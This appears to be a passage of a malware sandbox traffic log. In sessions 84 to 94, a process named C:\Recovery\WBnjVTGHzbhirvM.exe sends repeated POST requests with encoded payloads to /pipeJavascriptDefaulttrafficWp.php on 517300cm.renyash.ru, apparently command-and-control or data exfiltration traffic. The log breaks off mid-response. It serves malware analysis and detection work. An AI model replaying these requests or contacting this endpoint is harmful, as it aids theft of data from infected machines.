84	192.168.2.4	49956	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:19.413937092 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:19.768532038 CET	1012	OUT	Data Raw: 50 55 5b 5f 58 46 55 54 59 58 51 54 5b 5c 57 51 5f 56 58 54 52 5d 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU[_XFUTYXQT[\WQ_VXTR]ZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#+#\ > #X8;#4C+^=\/!-1#21; ,#<:'\"/Y.
Jan 9, 2025 18:13:19.894481897 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:20.071394920 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vSJMjnTydgILg7%2BjgzH31j33l3vGU87bW96i0QULcsZLnFmnaqCdyjXxhzb4YGDgSS2lKKICM1WC5YU5TmU2aB7jFE%2BT2jEV%2F3TB7%2FJop5dR561SuSlZtlGUSJJa4oEiAlSgiYM9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60eab0d243308-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3489&min_rtt=2016&rtt_var=3703&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=105743&cwnd=104&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49962	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:20.192343950 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:20.549798965 CET	1008	OUT	Data Raw: 50 5f 5b 59 5d 42 50 52 59 58 51 54 5b 55 57 50 5f 5c 58 5f 52 5b 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_[Y]BPRYXQT[UWP_\X_R[ZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)3)\#?>? 4-8#()\?!6$31%8#4?,+*'\"/Y.4
Jan 9, 2025 18:13:20.632492065 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49965	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:20.790708065 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:21.143768072 CET	1292	OUT	Data Raw: 50 5e 5b 59 58 47 50 50 59 58 51 54 5b 57 57 54 5f 5c 58 5e 52 52 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^[YXGPPYXQT[WWT_\X^RRZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z +#6#2>'/"5/))$"=9R2=R%7#X?'\"/Y.(
Jan 9, 2025 18:13:21.266588926 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:21.486329079 CET	953	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZR9jBZVWsd%2F4xXGuYH8vy8R1nFI9OqPPwekNp4y0UGWInIDIDTjjQE%2BpKpExVlYQTLe5oK0Y%2FlKuxyyK6FHhThWuylXTliRYIP9qoXsNA71jwgk4R9ymHVN3B5s3wRIIglFGit4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60eb399d9de97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3946&min_rtt=1493&rtt_var=5466&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=69138&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 14 26 35 27 53 24 2c 27 55 26 08 21 1d 22 21 2d 06 2f 2d 20 40 22 2a 0d 1b 2f 22 31 5a 36 3c 28 03 27 0b 31 57 31 02 3b 50 23 26 21 5d 01 12 27 07 25 39 2a 1f 27 2e 02 5e 26 01 20 19 23 3e 20 5b 27 2b 25 0a 31 23 24 57 20 3d 07 51 2a 2d 31 5a 3b 3f 33 05 2f 27 0e 13 3f 13 2b 51 0e 10 21 0b 24 13 21 07 2b 2e 2b 58 26 0b 3c 57 3d 01 3f 58 32 3f 2f 0d 3d 07 23 0b 27 2a 23 01 20 2f 3c 12 2b 14 38 58 27 3b 3a 09 3e 02 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!&5'S$,'U&!"!-/- @"/"1Z6<('1W1;P#&!]'%9'.^& #> ['+%1#$W =Q-1Z;?3/'?+Q!$!+.+X&<W=?X2?/=#'# /<+8X';:> \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49968	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:20.926479101 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:21.284194946 CET	1012	OUT	Data Raw: 55 52 5b 54 58 47 55 50 59 58 51 54 5b 52 57 56 5f 56 58 5a 52 53 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR[TXGUPYXQT[RWV_VXZRSZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *#?>#?\,; #C8>86& =S&]$ ,;X('\"/Y.
Jan 9, 2025 18:13:21.389874935 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:21.678847075 CET	800	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aa4Aw123d7lgVEOXhbV4loLK4XcMQXPXcRkL19Gd68rr4cy3RIAch9gAsZ9ipxvtANFLIApgp1Z8z5DNq5vpXEb%2BrkLCXFg8zItjn31G2Fu47AKyQtryaQtO5rz9rmLd8D2SgG5r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60eb4698843f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3739&min_rtt=1774&rtt_var=4596&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=83442&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49975	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:21.801731110 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:22.162154913 CET	1012	OUT	Data Raw: 50 57 5b 59 5d 43 55 55 59 58 51 54 5b 57 57 54 5f 54 58 5b 52 5c 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PW[Y]CUUYXQT[WWT_TX[R\ZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Z=!\ >]?#;],8#6$*)?56%3-T%74,#?'\"/Y.(
Jan 9, 2025 18:13:22.251842976 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:22.425674915 CET	803	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBUihAiuNiKfu5ePsEHWgSl6okSNpHS%2FLo3x%2FTmsqYWip7yGOZ4ZwoYOr0a7tEpE7gseZkVbwDy7DfZZJCJmB1uWXcfjmZMRVfU6PAqAKHlYuM87FxurvVksJJOuJ1Uk8me1nGKl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60eb9d8f54370-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4168&min_rtt=4140&rtt_var=1608&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=334555&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49980	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:22.557013988 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:22.909298897 CET	1012	OUT	Data Raw: 50 51 5b 5c 58 46 50 53 59 58 51 54 5b 52 57 54 5f 5c 58 59 52 5e 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ[\XFPSYXQT[RWT_\XYR^ZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Y*3. Z"\?0</+?X4%=T6)V29$(#^4,7('\"/Y.
Jan 9, 2025 18:13:23.114377975 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:23.351877928 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDiolOiZWAob3nNM%2BjG%2BU4FR1u6Q5bnrZCZOF1BfQSJHyeKCeSCRxxA08znXXEWw8nW9XgMsr4IoV7V5UHv8Ink%2BCaAGQDiZtiMkk82H9rkpxKtpY6N6Y01TViSjhL54OzHtgTP6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ebf3eac4386-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17967&min_rtt=12709&rtt_var=15282&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=26655&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49987	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:23.473155975 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:23.831168890 CET	1012	OUT	Data Raw: 50 55 5e 5c 58 48 55 53 59 58 51 54 5b 51 57 56 5f 53 58 55 52 58 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU^\XHUSYXQT[QWV_SXURXZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[=3.#]);8+7#$)05R%0&;+Y <<):'\"/Y.0
Jan 9, 2025 18:13:23.931138992 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:24.169910908 CET	810	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8whrcYPNITPm2a%2Bnq%2FqFi2iZ4z%2FLL68IhbU5oUFDeYYgpRzvtFQcFNcENN9yNo2zORUBfF7Q6M%2BmTQVanHNYULnbOuykM8Ttgw2u%2BRv6pt2wbBpqg3Nmx0o%2FiwocDWWYePuVjcYw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ec45ac4c436-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4286&min_rtt=2106&rtt_var=5150&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=74680&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49994	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:24.303284883 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:24.659306049 CET	1008	OUT	Data Raw: 50 5e 5e 5c 5d 42 50 50 59 58 51 54 5b 55 57 56 5f 5c 58 5b 52 5a 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^^\]BPPYXQT[UWV_\X[RZZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Z06 = ;\-;+7&<>; -:&)W%+0!/?X<'\"/Y.,
Jan 9, 2025 18:13:24.767129898 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:24.924968004 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxjWKPvwUNAQ1MbVpsMpY%2FV4tzYW%2BXHfB4sIO7ah0Lp8JUYlGHqcQw%2BjsXLVRaw1RDXII4QnuE75Ge1QnwEypOX9gaaIp7XE5DrxS%2BprIXLYHSvyq2Zs6DJSYfTBdQdliAx5R2ws"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ec988b143b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3822&min_rtt=2127&rtt_var=4189&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=93041&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49999	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:25.051650047 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:25.409498930 CET	1012	OUT	Data Raw: 50 56 5b 5b 58 44 55 56 59 58 51 54 5b 54 57 5d 5f 5c 58 54 52 53 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV[[XDUVYXQT[TW]_\XTRSZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z >3X#-* #8(<#+Z=U5==&*&(#X4<#?'\"/Y.$
Jan 9, 2025 18:13:25.648030043 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:25.892014980 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uA9%2BRDUvij%2B8cXW52733vNxDRZiJbplf938yeqptiZTsQJ6XbQEZ0%2BF79GXWbbj9Q4TkdsMnL1aKsSfmTvylmlef6cDhBqPbbyJ8YooZjXRik7u5%2FLPNo9JYIFf74i6n4J6lYW1A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ecf0bb70f63-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4845&min_rtt=2161&rtt_var=6179&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=61770&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50005	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:26.053571939 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:26.417900085 CET	1012	OUT	Data Raw: 55 50 5b 5f 58 45 55 51 59 58 51 54 5b 5c 57 50 5f 51 58 55 52 5a 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UP[_XEUQYXQT[\WP_QXURZZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *"4!>38;# /^>3"-W21W2+[7+](:'\"/Y.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50006	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:26.498166084 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:26.846674919 CET	1292	OUT	Data Raw: 50 5f 5e 5c 58 44 50 57 59 58 51 54 5b 56 57 55 5f 5c 58 5c 52 59 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_^\XDPWYXQT[VWU_\X\RYZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z###2Y#8;;7Y#4+*6>>%0$;'7<$<:'\"/Y.,
Jan 9, 2025 18:13:26.980977058 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:27.265460014 CET	948	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vB8pfFFzEbDGutuLX4XoK5ktJ8Mf3S1T1TOt2heqTaV2d1DubRstL2r8yvIA6rPNvLEaUw2%2FCKnZ6VTM4%2FYox5iywHQGEMqx1Ps1pezR2a3dGQH1X4ZsIzkwu8yKMIdVq%2FZ7F6HN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ed75d18c331-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7836&min_rtt=1651&rtt_var=12989&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=28553&cwnd=79&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 17 31 26 3c 0a 33 02 01 51 31 0f 31 1c 36 21 0c 58 3b 3e 2c 42 23 39 3c 01 2d 21 21 5e 36 59 2b 5a 30 32 32 0b 26 3c 09 18 36 26 21 5d 01 12 24 5b 24 2a 36 58 24 58 33 03 